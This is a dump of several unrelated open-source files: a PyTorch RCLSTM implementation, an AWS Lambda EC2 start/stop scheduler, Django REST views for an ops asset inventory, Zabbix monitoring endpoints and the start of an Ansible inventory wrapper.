init.xavier_uniform(self.weight_ih.data, gain=init.calculate_gain('sigmoid'))
init.xavier_uniform(self.weight_hh.data, gain=init.calculate_gain('sigmoid'))
init.constant(self.bias.data, val=0)
def forward(self, input_, hx):
"""
Args:
input_: A (batch, input_size) tensor containing input
features.
hx: A tuple (h_0, c_0), which contains the initial hidden
and cell state, where the size of both states is
(batch, hidden_size).
Returns:
h_1, c_1: Tensors containing the next hidden and cell state.
"""
h_0, c_0 = hx
batch_size = h_0.size(0)
bias_batch = (self.bias.unsqueeze(0).expand(batch_size, *self.bias.size()))
wh_b = torch.addmm(bias_batch, h_0, self.weight_hh)
wi = torch.mm(input_, self.weight_ih)
f, i, o, g = torch.split(wh_b + wi, self.hidden_size, dim=1)
c_1 = torch.sigmoid(f)*c_0 + torch.sigmoid(i)*torch.tanh(g)
h_1 = torch.sigmoid(o) * torch.tanh(c_1)
return h_1, c_1
def __repr__(self):
s = '{name}({input_size}, {hidden_size})'
return s.format(name=self.__class__.__name__, **self.__dict__)
class RCLSTMCell(nn.Module):
"""RCLSTM cell"""
def __init__(self, input_size, hidden_size, connectivity, device):
super(RCLSTMCell, self).__init__()
self.device = device
self.input_size = input_size
self.hidden_size = hidden_size
self.connectivity = connectivity
self.mask_wih = torch.FloatTensor(input_size, 4 * hidden_size)
self.mask_whh = torch.FloatTensor(hidden_size, 4 * hidden_size)
self.weight_ih = nn.Parameter(torch.FloatTensor(input_size, 4 * hidden_size))
self.weight_hh = nn.Parameter(torch.FloatTensor(hidden_size, 4 * hidden_size))
self.bias = nn.Parameter(torch.FloatTensor(4 * hidden_size))
self.reset_parameters()
def reset_parameters(self):
"""
Initialize parameters following the way proposed in the paper.
"""
self.mask_wih = torch.from_numpy(
generate_weight_mask((self.input_size, self.hidden_size), self.connectivity)).to(self.device)
        self.mask_whh = torch.from_numpy(
            generate_weight_mask((self.hidden_size, self.hidden_size), self.connectivity)).to(self.device)
weight_ih_data = init.orthogonal(self.weight_ih.data)
weight_ih_data = weight_ih_data * self.mask_wih.cpu().data
self.weight_ih.data.set_(weight_ih_data)
weight_hh_data = init.orthogonal(self.weight_hh.data)
weight_hh_data = weight_hh_data * self.mask_whh.cpu().data
self.weight_hh.data.set_(weight_hh_data)
# The bias is set to zero.
init.constant(self.bias.data, val=0)
def print_weight(self):
        print(self.weight_ih.data.numpy())
def forward(self, input_, hx):
"""
Args:
input_: A (batch, input_size) tensor containing input
features.
hx: A tuple (h_0, c_0), which contains the initial hidden
and cell state, where the size of both states is
(batch, hidden_size).
Returns:
h_1, c_1: Tensors containing the next hidden and cell state.
"""
h_0, c_0 = hx
batch_size = h_0.size(0)
bias_batch = (self.bias.unsqueeze(0).expand(batch_size, *self.bias.size()))
wh_b = torch.addmm(bias_batch, h_0, self.weight_hh * self.mask_whh)
wi = torch.mm(input_, self.weight_ih * self.mask_wih)
f, i, o, g = torch.split(wh_b + wi, self.hidden_size, dim=1)
c_1 = torch.sigmoid(f)*c_0 + torch.sigmoid(i)*torch.tanh(g)
h_1 = torch.sigmoid(o) * torch.tanh(c_1)
return h_1, c_1
def __repr__(self):
s = '{name}({input_size}, {hidden_size})'
return s.format(name=self.__class__.__name__, **self.__dict__)
class RNN(nn.Module):
"""A module that runs multiple steps of LSTM or RCLSTM."""
def __init__(self, device, cell_class, input_size, hidden_size, connectivity,
num_layers=1, batch_first=True, dropout=0):
super(RNN, self).__init__()
self.device = device
self.cell_class = cell_class
self.input_size = input_size
self.hidden_size = hidden_size
self.connectivity = connectivity
self.num_layers = num_layers
self.batch_first = batch_first
self.dropout = dropout
for layer in range(num_layers):
layer_input_size = input_size if layer == 0 else hidden_size
if cell_class == 'lstm':
cell = LSTMCell(input_size=layer_input_size, hidden_size=hidden_size)
else:
cell = RCLSTMCell(input_size=layer_input_size, hidden_size=hidden_size, connectivity=connectivity, device=device)
setattr(self, 'cell_{}'.format(layer), cell)
self.reset_parameters()
def get_cell(self, layer):
return getattr(self, 'cell_{}'.format(layer))
    def reset_parameters(self):
        for layer in range(self.num_layers):
            cell = self.get_cell(layer)
            cell.reset_parameters()
@staticmethod
def _forward_rnn(cell, input_, hx):
max_time = input_.size(0)
output = []
for time in range(max_time):
h_next, c_next = cell(input_=input_[max_time-1-time], hx=hx)
hx_next = (h_next, c_next)
output.append(h_next)
hx = hx_next
output = torch.stack(output, 0)
return output, hx
def forward(self, input_, hx=None):
if self.batch_first:
input_ = input_.transpose(0, 1)
max_time, batch_size, _ = input_.size()
if hx is None:
hx = input_.data.new(batch_size, self.hidden_size).zero_()
hx = (hx, hx)
h_n = []
c_n = []
layer_output = None
for layer in range(self.num_layers):
cell = self.get_cell(layer)
layer_output, (layer_h_n, layer_c_n) = RNN._forward_rnn(
cell=cell, input_=input_, hx=hx)
input_ = layer_output
h_n.append(layer_h_n)
c_n.append(layer_c_n)
output = layer_output
h_n = torch.stack(h_n, 0)
c_n = torch.stack(c_n, 0)
return output, (h_n, c_n)
``` |
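For orientation, the classes above can be exercised end to end on random data roughly as follows; this is a minimal sketch, assuming the file is importable as `rclstm` and that the deprecated `torch.nn.init` aliases it uses are still available in the installed PyTorch:
```python
# Minimal forward-pass sketch for the RNN wrapper defined above (illustrative only).
import torch
from rclstm import RNN  # assumes the file above is saved as rclstm.py

device = torch.device('cpu')
model = RNN(device=device, cell_class='rclstm', input_size=8, hidden_size=16,
            connectivity=0.5, num_layers=1, batch_first=True)
x = torch.randn(4, 10, 8)            # (batch, seq_len, input_size)
output, (h_n, c_n) = model(x)
print(output.shape)                  # (seq_len, batch, hidden): the output stays time-major
print(h_n.shape, c_n.shape)          # (num_layers, batch, hidden)
```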
{
"source": "jinjin123/aws-lambda-scheduler-stop-start",
"score": 3
} |
#### File: aws-lambda-scheduler-stop-start/package/ec2_handler.py
```python
import logging
import boto3
from botocore.exceptions import ClientError
# Setup simple logging for INFO
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.INFO)
def ec2_handler(schedule_action, tag_key, tag_value):
"""
Aws ec2 scheduler function, stop or
start ec2 instances by using the tag defined.
"""
# Define the connection
ec2 = boto3.client('ec2')
# Retrieve instance list
ec2_instance_list = ec2_list_instances(tag_key, tag_value)
# Stop ec2 instances in list
if schedule_action == 'stop':
try:
ec2.stop_instances(InstanceIds=ec2_instance_list)
LOGGER.info("Stop instances %s", ec2_instance_list)
except ClientError:
print('No instance found')
# Start ec2 instances in list
elif schedule_action == 'start':
try:
ec2.start_instances(InstanceIds=ec2_instance_list)
LOGGER.info("Start instances %s", ec2_instance_list)
except ClientError:
print('No instance found')
def ec2_list_instances(tag_key, tag_value):
"""
Aws ec2 instance list function, list name of all ec2 instances
all ec2 instances with specific tag and return it in list.
"""
# Define the connection
ec2 = boto3.client('ec2')
paginator = ec2.get_paginator('describe_instances')
page_iterator = paginator.paginate(
Filters=[{'Name': 'tag:'+tag_key, 'Values': [tag_value]},
{'Name': 'instance-state-name', 'Values': ['pending',
'running',
'stopping',
'stopped']}])
# Initialize instance list
instance_list = []
# Retrieve ec2 instances
for page in page_iterator:
for reservation in page['Reservations']:
for instance in reservation['Instances']:
# Retrieve ec2 instance id and add in list
instance_id = instance['InstanceId']
instance_list.insert(0, instance_id)
return instance_list
``` |
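The Lambda entry point that calls `ec2_handler` is not included in this file; a minimal sketch of how it could be wired up is shown below, where the event keys (`schedule_action`, `tag_key`, `tag_value`) and their defaults are assumptions rather than the project's actual contract:
```python
# Hypothetical Lambda handler wiring for ec2_handler (event keys and defaults are assumptions).
from ec2_handler import ec2_handler

def lambda_handler(event, context):
    schedule_action = event.get('schedule_action', 'stop')  # 'stop' or 'start'
    tag_key = event.get('tag_key', 'tostop')
    tag_value = event.get('tag_value', 'true')
    ec2_handler(schedule_action, tag_key, tag_value)
    return {'status': 'ok', 'action': schedule_action}
```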
{
"source": "jinjin123/devops2.0",
"score": 2
} |
#### File: ops/api/assets_api.py
```python
from rest_framework import viewsets, permissions
from ops.serializers import *
from ops.models import *
from rest_framework import status
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.decorators import api_view
from ops.views.tasks.tasks import recordAssets
from django.contrib.auth.decorators import permission_required
@api_view(['GET', 'POST'])
def idc_list(request, format=None):
if request.method == 'GET':
snippets = Idc_Assets.objects.all()
serializer = IdcSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = IdcSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加机房:{name}".format(name=request.data.get("name")),
type="idc", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def idc_detail(request, id, format=None):
try:
snippet = Idc_Assets.objects.get(id=id)
except Idc_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = IdcSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = IdcSerializer(snippet, data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="更新资产:{name}".format(name=snippet.name), type="idc",id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    elif request.method == 'DELETE':
        # Require both delete permissions; otherwise reject with 403
        if not (request.user.has_perm('ops.can_delete_assets')
                and request.user.has_perm('ops.can_delete_service_assets')):
            return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user),
content="删除idc:{name}".format(name=snippet.name), type="idc",id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def business_list(request, format=None):
if request.method == 'GET':
snippets = Business_Assets.objects.all()
serializer = BusinessSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = BusinessSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加业务分组名称:{business_name}".format(business_name=request.data.get("business_name")),
type="business", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def business_detail(request, id, format=None):
try:
snippet = Business_Assets.objects.get(id=id)
except Business_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = BusinessSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = BusinessSerializer(snippet, data=request.data)
old_name = snippet.business_name
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改业务分组为:{old_name} -> {business_name}".format(old_name=old_name,
business_name=request.data.get(
"business_name")),
type="business", id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    elif request.method == 'DELETE':
        # Require both delete permissions; otherwise reject with 403
        if not (request.user.has_perm('ops.can_delete_assets')
                and request.user.has_perm('ops.can_delete_service_assets')):
            return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user),
content="删除业务类型:{business_name}".format(business_name=snippet.business_name), type="business",
id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def service_list(request, format=None):
"""
    List all service types, or create a new one.
"""
if request.method == 'GET':
snippets = Service_Assets.objects.all()
serializer = ServiceSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = ServiceSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加业务类型名称:{service_name}".format(service_name=request.data.get("service_name")),
type="service", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def service_detail(request, id, format=None):
"""
    Retrieve, update or delete a service type instance.
"""
try:
snippet = Service_Assets.objects.get(id=id)
except Service_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = ServiceSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = ServiceSerializer(snippet, data=request.data)
old_name = snippet.service_name
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改业务类型为:{old_name} -> {service_name}".format(old_name=old_name,
service_name=request.data.get(
"service_name")),
type="service", id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    elif request.method == 'DELETE':
        # Require both delete permissions; otherwise reject with 403
        if not (request.user.has_perm('ops.can_delete_assets')
                and request.user.has_perm('ops.can_delete_service_assets')):
            return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user),
content="删除业务类型:{service_name}".format(service_name=snippet.service_name), type="service",
id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def group_list(request, format=None):
"""
    List all user groups, or create a new one.
"""
if request.method == 'GET':
snippets = RoleList.objects.all()
serializer = GroupSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if not request.user.has_perm('ops.change_group'):
return Response(status=status.HTTP_403_FORBIDDEN)
serializer = GroupSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加用户组:{group_name}".format(group_name=request.data.get("name")), type="group",
id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
@permission_required('ops.change_group', raise_exception=True)
def group_detail(request, id, format=None):
"""
    Retrieve, update or delete a user group instance.
"""
try:
snippet = RoleList.objects.get(id=id)
except RoleList.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = GroupSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = GroupSerializer(snippet, data=request.data)
old_name = snippet.name
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改用户组名称:{old_name} -> {group_name}".format(old_name=old_name,
group_name=request.data.get("name")),
type="group", id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.delete_group'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user), content="删除用户组:{group_name}".format(group_name=snippet.group_name),
type="group", id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
@permission_required('ops.can_add_zone_assets', raise_exception=True)
def zone_list(request, format=None):
"""
    List all zone assets, or create a new one.
"""
if request.method == 'GET':
snippets = Zone_Assets.objects.all()
serializer = ZoneSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = ZoneSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加出口线路:{zone_name}".format(zone_name=request.data.get("zone_name")),
type="zone", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
@permission_required('ops.can_change_zone_assets', raise_exception=True)
def zone_detail(request, id, format=None):
"""
    Retrieve, update or delete a zone asset instance.
"""
try:
snippet = Zone_Assets.objects.get(id=id)
except Zone_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = ZoneSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
old_name = snippet.zone_name
serializer = ZoneSerializer(snippet, data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改出口线路类型:{old_name} -> {zone_name}".format(old_name=old_name,
zone_name=request.data.get(
"zone_name")), type="zone",
id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.can_delete_zone_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user), content="删除出口线路:{zone_name}".format(zone_name=snippet.zone_name),
type="zone", id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
@permission_required('ops.can_add_line_assets', raise_exception=True)
def line_list(request, format=None):
"""
    List all line assets, or create a new one.
"""
if request.method == 'GET':
snippets = Line_Assets.objects.all()
serializer = LineSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = LineSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加出口线路:{line_name}".format(line_name=request.data.get("line_name")),
type="line", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
@permission_required('ops.can_change_line_assets', raise_exception=True)
def line_detail(request, id, format=None):
"""
    Retrieve, update or delete a line asset instance.
"""
try:
snippet = Line_Assets.objects.get(id=id)
except Line_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = LineSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = LineSerializer(snippet, data=request.data)
old_name = snippet.line_name
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改出口线路类型:{old_name} -> {line_name}".format(old_name=old_name,
line_name=request.data.get(
"line_name")), type="line",
id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.can_delete_line_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user), content="删除出口线路:{line_name}".format(line_name=snippet.line_name),
type="line", id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def raid_list(request, format=None):
"""
    List all RAID types, or create a new one.
"""
if request.method == 'GET':
snippets = Raid_Assets.objects.all()
serializer = RaidSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = RaidSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="添加Raid类型:{raid_name}".format(raid_name=request.data.get("raid_name")),
type="raid", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def raid_detail(request, id, format=None):
"""
    Retrieve, update or delete a RAID type instance.
"""
try:
snippet = Raid_Assets.objects.get(id=id)
except Raid_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = RaidSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
old_name = snippet.raid_name
serializer = RaidSerializer(snippet, data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user),
content="修改Raid类型:{old_name} -> {raid_name}".format(old_name=old_name,
raid_name=request.data.get(
"raid_name")), type="raid",
id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.can_delete_raid_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user), content="删除Raid类型:{raid_name}".format(raid_name=snippet.raid_name),
type="raid", id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def asset_list(request, format=None):
if request.method == 'GET':
snippets = Assets.objects.all()
serializer = AssetsSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
serializer = AssetsSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="添加资产:{name}".format(name=request.data.get("name")),
type="assets", id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def asset_detail(request, id, format=None):
try:
snippet = Assets.objects.get(id=id)
except Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = AssetsSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
serializer = AssetsSerializer(snippet, data=request.data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="更新资产:{name}".format(name=snippet.name), type="assets",id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.delete_asset_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
recordAssets.delay(user=str(request.user), content="删除资产:{name}".format(name=snippet.name), type="assets",
id=id)
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def asset_server_list(request, format=None):
if request.method == 'GET':
snippets = HostInfo.objects.all()
serializer = ServerSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if (request.data.get('data')):
data = request.data.get('data')
else:
data = request.data
# keyword = ['ip','user','login_type','pwd','key']
"""
        When adding an asset the server login is not checked here; a crontab job periodically picks
        assets whose user field is not empty, runs sshCheck, and writes the updated status back to the database.
"""
print(data)
serializer = ServerSerializer(data=data)
# print serializer
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="添加服务器资产:{ip}".format(ip=data.get("ip")), type="server",
id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def asset_server_detail(request, id, format=None):
try:
snippet = HostInfo.objects.get(id=id)
except HostInfo.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = ServerSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
        '''If the update payload contains an assets section, update the master Assets record first'''
print(request.data.get('data'))
if (request.data.get('data')):
data = request.data.get('data')
else:
data = request.data
if (data.get('assets')):
assets_data = data.pop('assets')
try:
assets_snippet = Assets.objects.get(id=snippet.assets.id)
assets = AssetsSerializer(assets_snippet, data=assets_data)
except Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if assets.is_valid():
assets.save()
recordAssets.delay(user=str(request.user), content="修改服务器资产:{ip}".format(ip=snippet.ip), type="server",
id=id)
print(data)
serializer = ServerSerializer(snippet,data=data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.can_delete_server_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
try:
assets_snippet = Assets.objects.get(id=snippet.assets.id)
assets_snippet.delete()
recordAssets.delay(user=str(request.user), content="删除服务器资产:{ip}".format(ip=snippet.ip), type="server",
id=id)
except Assets.DoesNotExist:
pass
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'POST'])
def asset_net_list(request, format=None):
"""
    List all network assets, or create a new one.
"""
if request.method == 'GET':
snippets = Network_Assets.objects.all()
serializer = NetworkSerializer(snippets, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if (request.data.get('data')):
data = request.data.get('data')
else:
data = request.data
serializer = NetworkSerializer(data=data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="添加网络设备资产:{ip}".format(ip=data.get("ip")), type="net",
id=serializer.data.get('id'))
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'PUT', 'DELETE'])
def asset_net_detail(request, id, format=None):
"""
    Retrieve, update or delete a network asset instance.
"""
try:
snippet = Network_Assets.objects.get(id=id)
except Network_Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = NetworkSerializer(snippet)
return Response(serializer.data)
elif request.method == 'PUT':
        '''If the update payload contains an assets section, update the master Assets record first'''
if (request.data.get('data')):
data = request.data.get('data')
else:
data = request.data
if (data.get('assets')):
assets_data = data.pop('assets')
try:
assets_snippet = Assets.objects.get(id=snippet.assets.id)
assets = AssetsSerializer(assets_snippet, data=assets_data)
except Assets.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if assets.is_valid():
assets.save()
serializer = NetworkSerializer(snippet, data=data)
if serializer.is_valid():
serializer.save()
recordAssets.delay(user=str(request.user), content="更新网络设备资产:{ip}".format(ip=snippet.ip), type="net", id=id)
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
if not request.user.has_perm('ops.delete_net_assets'):
return Response(status=status.HTTP_403_FORBIDDEN)
snippet.delete()
try:
assets_snippet = Assets.objects.get(id=snippet.assets.id)
assets_snippet.delete()
recordAssets.delay(user=str(request.user), content="删除网络设备资产:{ip}".format(ip=snippet.ip), type="net", id=id)
except Assets.DoesNotExist:
pass
return Response(status=status.HTTP_204_NO_CONTENT)
```
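These function-based views need to be registered in a `urls.py`, which is not part of this file; the routes below are therefore only a plausible sketch, with the paths themselves being assumptions:
```python
# Hypothetical URL wiring for a few of the asset views above (paths are assumptions).
from django.conf.urls import url
from ops.api import assets_api

urlpatterns = [
    url(r'^api/idc/$', assets_api.idc_list),
    url(r'^api/idc/(?P<id>[0-9]+)/$', assets_api.idc_detail),
    url(r'^api/server/$', assets_api.asset_server_list),
    url(r'^api/server/(?P<id>[0-9]+)/$', assets_api.asset_server_detail),
]
```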
#### File: ops/api/zabbix_api.py
```python
from __future__ import division
from rest_framework import viewsets, mixins
from rest_framework.viewsets import ViewSet
from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view
from ops.views.zabbix import zabbix
import time
from datetime import datetime
"""
List hosts, optionally filtered by group.
"""
@api_view(['GET'])
def HostView(request):
group = request.GET.get('group', None)
if group:
return Response(zabbix.host_list(group))
else:
return Response(zabbix.host_list())
"""
List host groups.
"""
@api_view(['GET'])
def GroupView(request):
return Response(zabbix.group_list())
"""
Fetch CPU monitoring history for a host.
"""
@api_view(['GET'])
def CpuView(request,hostid):
List = zabbix.cpu_list(hostid)
arr1 = []
arr2 = []
for i in List:
# print i
arr1.append(int(i[u'clock']) * 1000)
        # values may be integers or floats
arr1.append(float(i[u'value']))
arr2.append(arr1)
arr1=[]
return Response(arr2)
# return Response(zabbix.cpu_list(hostid))
"""
Fetch memory monitoring history for a host.
"""
@api_view(['GET'])
def MemoryView(request,hostid):
List = zabbix.memory_list(hostid)
arr1 = []
arr2 = []
for i in List:
# print i
arr1.append(int(i[u'clock']) * 1000)
        # clock is in seconds -> milliseconds; the value below is converted from bytes to GiB
arr1.append(float(round(int(i[u'value']) / 1024 / 1024 /1024,2)))
arr2.append(arr1)
arr1=[]
return Response(arr2)
# return Response(zabbix.memory_list(hostid))
"""
Fetch disk monitoring history for a host.
"""
@api_view(['GET'])
def DiskView(request,hostid):
List = zabbix.disk_list(hostid)
arr1 = []
arr2 = []
for i in List:
# print i
arr1.append(int(i[u'clock']) * 1000)
        # clock is in seconds -> milliseconds; the value below is converted from bytes to GiB
arr1.append(float(round(int(i[u'value']) / 1024 / 1024 /1024,2)))
arr2.append(arr1)
arr1=[]
return Response(arr2)
# return Response(zabbix.disk_list(hostid))
"""
Get CPU, memory and disk usage percentages.
"""
@api_view(['GET'])
def UsageView(request, hostid):
if hostid:
return Response(zabbix.usage(hostid))
else:
return Response()
"""
Get the event list.
"""
@api_view(['GET'])
def EventView(request):
return Response(zabbix.event_list())
"""
Get monitoring history for a given service type (e.g. Httpd/FTP).
"""
@api_view(['GET'])
def ServiceItemsView(request, *args, **kwargs):
service = request.query_params.get('service', None)
history_list = zabbix.service_item_list(service)
return Response(history_list)
"""
Get history data for a given itemid.
"""
@api_view(['GET'])
def HistoryView(request,itemid):
history_list = zabbix.history_list(itemid)
return Response(history_list)
```
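The three history views above repeat the same reshaping loop: Zabbix `clock` values in seconds become millisecond timestamps and the value is cast to a float (or converted from bytes to GiB), so the response can be fed to a charting library as `[timestamp_ms, value]` pairs. A small helper capturing that pattern, as a sketch rather than code from the project:
```python
# Sketch of the [timestamp_ms, value] reshaping repeated in CpuView/MemoryView/DiskView.
def to_series(history, to_gib=False):
    series = []
    for point in history:
        value = float(point['value'])
        if to_gib:
            value = round(value / 1024 / 1024 / 1024, 2)    # bytes -> GiB
        series.append([int(point['clock']) * 1000, value])  # seconds -> milliseconds
    return series
```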
#### File: views/asb_model/ansibleApi.py
```python
import json, sys, os,redis
from collections import namedtuple
from ansible.parsing.dataloader import DataLoader
from ansible.vars import VariableManager
from ansible.inventory import Inventory, Host, Group
from ansible.playbook.play import Play
from ansible.executor.task_queue_manager import TaskQueueManager
from ansible.plugins.callback import CallbackBase
from ansible.executor.playbook_executor import PlaybookExecutor
from ops.views.ssh_settings import redisip,redisport
r = redis.StrictRedis(host=redisip, port=redisport, db=0)
# r = redis.StrictRedis(host='172.16.17.32', port='23456', db=0)
class MyInventory(Inventory):
"""
this is my ansible inventory object.
"""
def __init__(self, resource, loader, variable_manager):
"""
        resource is a dict keyed by group name, for example:
{
"group1": {
"hosts": [{"hostname": "10.0.0.0", "port": "22", "username": "test", "password": "<PASSWORD>"}, ...],
"vars": {"var1": value1, "var2": value2, ...}
}
}
        If you pass a plain list instead, every host in it is placed into the default group, for example:
